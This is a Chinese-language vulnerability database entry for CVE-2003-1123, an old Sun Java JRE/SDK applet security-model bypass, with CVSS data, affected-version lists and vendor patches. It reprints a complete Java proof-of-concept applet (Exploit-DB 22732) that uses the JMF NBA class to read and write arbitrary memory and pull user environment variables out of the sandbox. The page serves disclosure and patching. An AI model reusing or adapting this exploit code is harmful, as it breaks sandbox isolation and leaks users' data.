CVE-2003-1123
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:06
NMCOE    

[原文]Sun Java Runtime Environment (JRE) and SDK 1.4.0_01 and earlier allows untrusted applets to access certain information within trusted applets, which allows attackers to bypass the restrictions of the Java security model.


[CNNVD]Sun Microsystems不可信Applet Java安全模型冲突漏洞(CNNVD-200312-467)

        
        Solaris系统的Java Runtime Environment (JRE)为JAVA应用程序提供可靠的运行环境。
        Java Runtime Environment (JRE)允许不可Applet从可信Applet中访问信息,远程攻击者可以利用这个漏洞绕过Java安全模型访问受限资源。
        目前没有详细漏洞细节。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sun:jre:1.3.1_03::windows
cpe:/a:sun:jre:1.2.2::solaris
cpe:/a:sun:jdk:1.4.0_01::windows
cpe:/a:sun:jre:1.3.0:update4:windows
cpe:/a:sun:jdk:1.2.2_10::solaris
cpe:/a:sun:jdk:1.4::solaris
cpe:/a:sun:jre:1.3.0:update5:linux
cpe:/a:sun:jdk:1.3::solaris
cpe:/a:sun:jdk:1.3.0_02::windows
cpe:/a:sun:jre:1.2.2_011::solaris
cpe:/a:sun:jre:1.3.0:update5:solaris
cpe:/a:sun:jdk:1.2.2_12::windows
cpe:/a:sun:jdk:1.3.1_03::solaris
cpe:/a:sun:jre:1.3.0:update5:windows
cpe:/a:sun:jre:1.3.1_03::solaris
cpe:/a:sun:jre:1.3.1:update1:linux
cpe:/a:sun:jre:1.3.1:update4:windows
cpe:/a:sun:jdk:1.3.1_04::windows
cpe:/a:sun:jre:1.2.2_011::linux
cpe:/a:sun:jdk:1.3.0_05::windows
cpe:/a:sun:jre:1.3.1::linux
cpe:/a:sun:jdk:1.2.2_10::windows
cpe:/a:sun:jre:1.2.2_003::linux
cpe:/a:sun:jre:1.3.1:update4:solaris
cpe:/a:sun:jre:1.2.2_012::solaris
cpe:/a:sun:jdk:1.2.2_11::linux
cpe:/a:sun:jdk:1.3.0_02::solaris
cpe:/a:sun:jre:1.3.0:update2:linux
cpe:/a:sun:jdk:1.2.2::solaris
cpe:/a:sun:jdk:1.3.0_05::linux
cpe:/a:sun:jdk:1.3.0_05::solaris
cpe:/a:sun:jre:1.2.2:update10:linux
cpe:/a:sun:jdk:1.2.2_10::linux
cpe:/a:sun:jre:1.3.0::solaris
cpe:/a:sun:jre:1.3.1:update1:windows
cpe:/a:sun:jre:1.3.1:update1:solaris
cpe:/a:sun:jdk:1.3.0_02::linux
cpe:/a:sun:jdk:1.3.1_03::windows
cpe:/a:sun:jre:1.2.2:update10:solaris
cpe:/a:sun:jre:1.4::linux
cpe:/a:sun:jdk:1.3.1_01::linux
cpe:/a:sun:jre:1.3.0::windows
cpe:/a:sun:jre:1.2.2::windows
cpe:/a:sun:jdk:1.4::linux
cpe:/a:sun:jre:1.4::solaris
cpe:/a:sun:jdk:1.3.1_01::solaris
cpe:/a:sun:jdk:1.2.2_11::windows
cpe:/a:sun:jdk:1.2.2_11::solaris
cpe:/a:sun:jre:1.4::windows
cpe:/a:sun:jre:1.2.2_011::windows
cpe:/a:sun:jdk:1.4::windows
cpe:/a:sun:jre:1.3.0:update2:windows
cpe:/a:sun:jdk:1.3.1_03::linux
cpe:/a:sun:jre:1.3.0:update2:solaris
cpe:/a:sun:jre:1.4.0_01::windows
cpe:/a:sun:jre:1.3.0::linux
cpe:/a:sun:jdk:1.3.1_01a::windows
cpe:/a:sun:jre:1.3.1_03::linux
cpe:/a:sun:jre:1.2.2:update10:windows
cpe:/a:sun:jre:1.4.0_01::solaris

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1123
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1123
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-467
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/393292
(VENDOR_ADVISORY)  CERT-VN  VU#393292
http://www.securityfocus.com/bid/7824
(PATCH)  BID  7824
http://sunsolve.sun.com/search/document.do?assetkey=1-26-55100-1
(VENDOR_ADVISORY)  SUNALERT  55100
http://xforce.iss.net/xforce/xfdb/12189
(UNKNOWN)  XF  sun-applet-access-information(12189)
http://securitytracker.com/id?1006935
(UNKNOWN)  SECTRACK  1006935
http://secunia.com/advisories/8958
(UNKNOWN)  SECUNIA  8958

- 漏洞信息

Sun Microsystems不可信Applet Java安全模型冲突漏洞
高危 设计错误
2003-12-31 00:00:00 2005-10-20 00:00:00
本地  
        
        Solaris系统的Java Runtime Environment (JRE)为JAVA应用程序提供可靠的运行环境。
        Java Runtime Environment (JRE)允许不可Applet从可信Applet中访问信息,远程攻击者可以利用这个漏洞绕过Java安全模型访问受限资源。
        目前没有详细漏洞细节。
        

- 公告与补丁

        厂商补丁:
        Sun
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Sun SDK (Solaris Production Release) 1.2.2 _10:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Reference Release) 1.2.2 _012:
        Sun Upgrade SDK and JRE (Solaris OE Reference Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.2.2 _012:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2 _012:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Reference Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Solaris OE Reference Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.2.2 _003:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.2.2:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Reference Release) 1.2.2:
        Sun Upgrade SDK and JRE (Solaris OE Reference Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.2.2:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.3.1 _04:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.3.1 _04:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.3.1 _04:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.3.1 _01a:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.3.1:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.4 .0_01:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.4 .0_01:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.4 .0_01:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.4:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Pr

- 漏洞信息 (22732)

Sun JRE/SDK 1.x Untrusted Applet Java Security Model Violation Vulnerability (EDBID:22732)
multiple local
2003-06-05 Verified
0 Marc Schoenefeld
N/A [点击下载]
source: http://www.securityfocus.com/bid/7824/info

It has been reported that the Sun Java Runtime Environment does not properly protect trusted java applets. Because of this, it may be possible for an attacker to use a malicious applet to gain access to sensitive information. 

/*
Proof-Of-Concept: Read Environment via vulnerability Java Media Framework
(2003) Marc Schoenefeld, www.illegalaccess.org

*/

import com.sun.media.NBA;
import java.applet.Applet;
import java.awt.Graphics;
import javax.swing.JOptionPane;
class NBAFactory {

		 		 public static String getEnv(String a,long from, long to) {
		 		 		 long pos = findMem(a,from,to);
		 		 		 String ret = "";
		 		 		 if (pos  != -1) {
		 		 		 		 long pos2 = pos+a.length();
		 		 		 		 ret = getString(pos2);
		 		 		 }
		 		 		 return ret;
		 		 }

		 		 public static String getString(long pos) {
		 		 		 int i = 0;
		 		 		 StringBuffer b = new StringBuffer();
		 		 		 char x = 0;
		 		 		 do {
		 		 		 		 x = (char) readMem(pos+i);
		 		 		 		 i++;
		 		 		 		 if (x != 0)
		 		 		 		 b.append(x);

		 		 		 } while (!(x == 0));
		 		 		 return b.toString();
		 		 }

		 		 public static long findMem(String a, long from , long to)  {
		 		 		 char[] ch = a.toCharArray();
		 		 		 for (long pos = from; pos < to ;pos++) {
//		 		 		 		 System.out.println(pos-from+":");
		 		 		 		 int i = 0;
		 		 		 		 int found = 0;
		 		 		 		 for (i = 0; i < ch.length; i++) {
		 		 		 		 		 char x = (char) readMem(pos+i);
//		 		 		 		 		 System.out.println(pos+":"+x);
		 		 		 		 		 if (x == ch[i]) {
		 		 		 		 		 		 found ++;
		 		 		 		 		 }
		 		 		 		 		 else
		 		 		 		 		    break;
		 		 		 		 }
		 		 		 		 if (found == ch.length) {
		 		 		 		 		 return pos;
		 		 		 		 }
		 		 		 }
		 		 		 return -1;
		 		 }

		 		 public static byte readMem(long i) {
		 		 		 byte[] by = new byte[1];
		 		 		 NBA searcher = new NBA(byte[].class,1);
		 		 		 long olddata = searcher.data;
		 		 		 searcher.data = i;
		 		 		 searcher.size = 1;
		 		 		 searcher.copyTo(by);
		 		 		 searcher.data = olddata; // keep the finalizer happy
		 		 		 return by[0];
		 		 }

		 		 public static void setMem(long i, char c) {
		 		 		 NBA b = new NBA(byte[].class,1);
		 		 		 long olddata = b.data;
		 		 		 b.data = i;
		 		 		 b.size = 1;
		 		 		 theBytes[c].copyTo(b);
		 		 		 b.data  = olddata; // keep the finalizer happy
		 		 }

		 		 public static void setMem(long i, byte by) {
		 		 		 setMem(i,(char) by);
		 		 }


		 		 public static void setMem(long i, int by) {
		 		 		 setMem(i,(char) by);
		 		 }


		 		 public static void setMem(long l, String s) {
		 		 		 char[] theChars = s.toCharArray();
		 		 		 NBA b = new NBA(byte[].class,1);
		 		 		 long olddata = b.data;
		 		 		 for (int i = 0 ; i  < theChars.length; i++) {
		 		 		 		 b.data = l+i;
		 		 		 		 b.size = 1;
		 		 		 		 theBytes[theChars[i]].copyTo(b);
		 		 		 }
		 		 		 b.data  = olddata; // keep the finalizer happy
		 		 }


		 		 private NBAFactory() {
		 		 }
		 		 public static NBA getByte(char i) {
		 		 		 return theBytes[i];
		 		 }

		 		 public static NBA getByte(int i) {
		 		 		 return theBytes[(char) i];
		 		 }

		 		 public static NBA[] getBytes() {
		 		 		 return theBytes;
		 		 }

		 		 static NBA[] theBytes = new NBA[256];
		 		 static {
		 		 		 for (char i = 0; i < 256; i++) {
//		 		 		 		 System.out.println((byte)i);
		 		 		 		 NBA n = search(i,0x6D340000L, 0x6D46A000L);
		 		 		 		 if (n!=null)
		 		 		 		 		 theBytes[i]= n;
		 		 		 		 else
		 		 		 		 		 System.exit(-1);
		 		 		 }
		 		 }

		 		 static NBA search (char theChar,long start, long end) {
		 		 		 NBA ret = null;
		 		 		 NBA searcher = new NBA(byte[].class,1);
		 		 		 byte[] ba = new byte[1];
		 		 		 for (long i = start; i < end ; i++) {
//		 		 		 		 byte b = readMem(i);
		 		 		 		 searcher.data = i;
		 		 		 		 searcher.copyTo(ba);
//		 		 		 		 if ( b == (byte)theChar) {
		 		 		 		 if ( ba[0] == (byte)theChar) {
		 		 		 		 		 return searcher;
		 		 		 		 }
		 		 		 }
		 		 		 return null;
		 		 }
		 }

public class ReadEnv extends Applet{

		 static NBA base = new NBA(byte[].class,18);  // what's the base pointer ?



		 public static void crash(Object o) {

		   System.out.println("Proof-Of-Concept: Read Environment via vulnerability Java Media Framework");

		   System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org");


		   NBA ret = new NBA(byte[].class,4);
		   long oldret = ret.data;

 		   System.out.println("Base of data: "+Long.toString(base.data,16));

		   String[] envs = {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH",
		   		 "TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"};

		   for (int i = 0; i < envs.length; i++) {
		   		 String val = NBAFactory.getEnv(envs[i],base.data,base.data+32768);
		   		 if (!(o instanceof Applet)) {
		   		 		 System.out.println(envs[i]+":"+val);
		 		 }
		 		 else {
		 		 		 javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,envs[i]+":"+val);
		 		 }
		   }


		   //NBAFactory.setMem(pos+10,'A');
		   try {
          System.out.println(System.getProperty("java.class.path"));
		   java.util.Properties p = System.getProperties();

		   p.list(System.out);
		   }
		   catch (java.security.AccessControlException e) {
		   		 System.out.println("Cannot read environment via getProperties:"+e);
		   }

		   //System.out.println(pos);

		   //long pos2 = NBAFactory.findMem("mixed",base.data,base.data+6614096);
		   //System.out.println(pos2);


		   //byte[] x11 = new byte[8];
		   //ret.copyTo(x11);
		   //for (int i = 0; i < x11.length; i++) {
		   //		 System.out.println(i+":"+x11[i]+(char)x11[i]);
		   //}



		   ret.data = oldret;

		   //ret.data = 0xffff8000;

		   //ret.finalize();
		   //ret.finalize();

		   //NBAFactory.setMem(ret.data-0xffff8000,33);


		   //ret.finalize();

		   /*b.data = base.data;
		   b.size = 16384;*/

		   /*byte[] ba3 = new byte[16384];
 		   b.copyTo(ba3);
		   for (int i = 0; i < ba3.length; i++) {
		   		 System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)ba3[i]);
		   }*/

          /*b.data = olddata;*/



		 }

		 public static void main(String[] a) {
		 		 crash(null);
		 }

		 public void paint(Graphics g) {

		 		 if (init == 0) {
		 		 		 init=1;
		 		 		 crash(this);
		 		 }
		 }

		 static int init = 0;
}
		

- 漏洞信息

15151
Sun Java JRE / SDK Untrusted Applet Java Security Model Bypass

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-04 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站